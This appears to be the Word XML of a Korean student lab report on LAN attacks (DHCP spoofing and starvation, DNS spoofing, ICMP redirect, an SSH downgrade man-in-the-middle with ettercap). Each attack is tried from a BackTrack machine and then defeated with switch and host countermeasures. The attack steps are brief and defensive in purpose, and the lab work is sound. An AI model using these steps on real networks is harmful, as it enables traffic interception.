        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RPF [Unicast Reverse Path Forwarding] </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">기능은 출발지 주소를 확인했을 때 네트워크 내의 주소이지 않은 주소가 밖으로 나가는 것을 차단시켜 주는 기능을 하고 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ARP Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 대응책을 설정해놓으면 어느 정도 차단 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00924F61" w:rsidRDefault="00924F61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E151D6" w:rsidRDefault="00E151D6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t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HCP Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E151D6" w:rsidRPr="00E151D6" w:rsidRDefault="00E151D6" w:rsidP="00E151D6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783BD5B" wp14:editId="240413FE">
            <wp:extent cx="3600000" cy="2314800"/>
            <wp:effectExtent l="0" t="0" r="635" b="952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poofing</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 방어하는 방법으로는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DHCP Snooping</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 사용하는 편이 좋음,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sniffing</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">과 같이 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 엿보지만 관리의 목적으로 사용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DHCP </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nooping </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">설정은 관리자가 스위치상에 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">와 연결된 포트를 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Untrusted</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">포트로 설정을 해주고 반대되는 포트에 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Trusted </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>포트로 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E151D6" w:rsidRDefault="00E151D6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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HCP Starvation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E151D6" w:rsidRDefault="00E151D6" w:rsidP="00E151D6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1BEF9046" wp14:editId="507E8075">
            <wp:extent cx="3600000" cy="1720800"/>
            <wp:effectExtent l="0" t="0" r="635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D</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HCP Starvation</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">은 </w:t>
      </w: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를 사용해 어느 정도 방어가 가능 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>Port Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 설정은 먼저 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>switch port-security maximum [</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>저장 갯수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를 사용해 학습 가능한 최대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 xml:space="preserve">주소를 설정해주고 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">switch port-security </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>명령을 사용해 활성화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noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Switchport port-security mac-address sticky </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">명령어를 사용해 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MAC </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>주소를 동적으로 학습되도록하고 학습한 주소를 저장할 수 있도록 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E151D6" w:rsidRDefault="00E15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NS Spoofing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0D36F32" wp14:editId="2A5DAC94">
            <wp:extent cx="3599180" cy="2316480"/>
            <wp:effectExtent l="0" t="0" r="1270" b="762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. Client PC의 Hosts파일 찾기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23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AAFEEE1" wp14:editId="6A6BFC43">
            <wp:extent cx="3599180" cy="2026920"/>
            <wp:effectExtent l="0" t="0" r="127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 관리자 권한으로 수정을 해야하기 때문에 관리지권한실행을 위한 바로가기 만들기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7" cy="20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D2DB2E0" wp14:editId="2D3401CF">
            <wp:extent cx="3598545" cy="2247900"/>
            <wp:effectExtent l="0" t="0" r="190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 만든 파일을 관리자의 권한으로 실행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9" cy="2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>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>indow</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 경우</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> c:\windows\system32\drivers\etc </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">경로에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이 있음</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일은 관리자권한으로 수정해야 하는데 그를 위해 바로가기 생성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E151D6" w:rsidRPr="00E151D6" w:rsidRDefault="00E151D6" w:rsidP="00E151D6">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:ind w:leftChars="0" w:left="1164"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">바로가기 생성 시 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">c:\windows\system32\notepad.exe c:\windows\system32\drivers\etc\hosts </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">라고 쳐주면 </w:t>
      </w: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>파일을 열어줌</w:t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rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="595BF121" wp14:editId="373E5229">
            <wp:extent cx="3599230" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="127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 BT으로 공격 시도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50" cy="1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20FEB5B2" wp14:editId="668D3FEF">
            <wp:extent cx="3599814" cy="1120140"/>
            <wp:effectExtent l="0" t="0" r="1270" b="381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 BT으로 공격 시도2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3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noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">네이버의 주소를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Soulworker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>페이지로 유도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874512" wp14:editId="777177C3">
            <wp:extent cx="3598545" cy="1859280"/>
            <wp:effectExtent l="0" t="0" r="1905" b="762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. hosts파일 수정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93" cy="18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9A6D0B5" wp14:editId="4FA17EA7">
            <wp:extent cx="3599108" cy="2042160"/>
            <wp:effectExtent l="0" t="0" r="190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. 공격 실패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3" cy="20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E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Notepad</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 이용해 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 열어 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>아이피</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>] [</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>도메인</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 도메인에 대한 아이피 주소를 고정 후 공격대상 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에서 공격 당한 페이지를 열어보면 공격 실패</w:t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A</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RP Spoofing </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격에 대한 방어 방법을 사용한다면 공격 방어 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E151D6" w:rsidRPr="00E151D6" w:rsidRDefault="00E151D6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I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CMP Redirect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E151D6" w:rsidRDefault="00E151D6" w:rsidP="00E151D6">
      <w:pPr>
        <w:ind w:left="76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B4738BE" wp14:editId="0658C025">
            <wp:extent cx="3600000" cy="1908000"/>
            <wp:effectExtent l="0" t="0" r="635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 윈도우의 경우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방화벽에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>설정을 눌러 방향전환요청을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체크 해제</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E151D6" w:rsidRDefault="00E151D6" w:rsidP="00E151D6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777B3400" wp14:editId="4C86D61E">
            <wp:extent cx="3599443" cy="2133600"/>
            <wp:effectExtent l="0" t="0" r="127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12" cy="2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02FD489" wp14:editId="05F96FBA">
            <wp:extent cx="3599426" cy="2590800"/>
            <wp:effectExtent l="0" t="0" r="127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 공격을 위해 포워딩 시작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14" cy="25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18406306" wp14:editId="792399DE">
            <wp:extent cx="3599180" cy="1790700"/>
            <wp:effectExtent l="0" t="0" r="127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 공격 시도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1" cy="1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2D07B7B2" wp14:editId="1C1EE422">
            <wp:extent cx="3599815" cy="1927860"/>
            <wp:effectExtent l="0" t="0" r="635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 XP 라우팅 테이블 확인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6" cy="1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Pr="00463320" w:rsidRDefault="00E151D6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대응책 설정 후 다시 공격을 시도했을 때 공격이 되지 않는 것을 볼 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00924F61" w:rsidRDefault="00924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51D6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2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SH </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">취약점 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SH MITM Attack)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02C3928B" wp14:editId="23D98829">
            <wp:extent cx="3599725" cy="1661160"/>
            <wp:effectExtent l="0" t="0" r="127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. Linux서버에서 sshd_config 설정파일 열어 Protocol을 2로 수정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54" cy="16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3180B46" wp14:editId="5C755106">
            <wp:extent cx="3597910" cy="1478280"/>
            <wp:effectExtent l="0" t="0" r="254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-1 수정 후 서비스 재 시작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6" cy="1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S</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SH </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">취약점 공격에 대응하기 위해서는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">서버의 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tc/ssh/sshd_config </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">파일을 열어 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을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>로 수정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수정 후에는 서비스 재 시작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2D922635" wp14:editId="5AD077D3">
            <wp:extent cx="3600000" cy="2322000"/>
            <wp:effectExtent l="0" t="0" r="635" b="254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. ettercap 툴과 etter.filter.ssh.co 파일을 이용해 DNS서버에 공격 시도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B</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 돌아가 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>취약점 공격 시도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671A8079" wp14:editId="7EBF8E00">
            <wp:extent cx="3599644" cy="2507672"/>
            <wp:effectExtent l="0" t="0" r="1270" b="698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. 공격 대상 PC에서 접속 시도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4" cy="2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33907BB" wp14:editId="5DEA4CCD">
            <wp:extent cx="3600000" cy="2235600"/>
            <wp:effectExtent l="0" t="0" r="63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. 접속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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">공격 시도 후 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">공격 대상 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 가서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">서버에 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로 접근 시도</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00463320" w:rsidRDefault="004633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 wp14:anchorId="3BD7EBAF" wp14:editId="65797CAD">
            <wp:extent cx="3598545" cy="1303020"/>
            <wp:effectExtent l="0" t="0" r="1905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 버전확인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79" cy="1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C243374" wp14:editId="53D6AA4A">
            <wp:extent cx="3594554" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="635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 Client에서 와이어 샤크로 볼 때도 다운그레이드가 되지 않았음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70" cy="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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NS</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">서버에 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 접근을 시도 한 후 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BT</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 돌아가서 확인해보면 버전이 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">라서 읽어오지 못하는 것을 볼 수 있고 다시 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Client PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에서 확인했을 때 버전이 D</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>owngrade</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
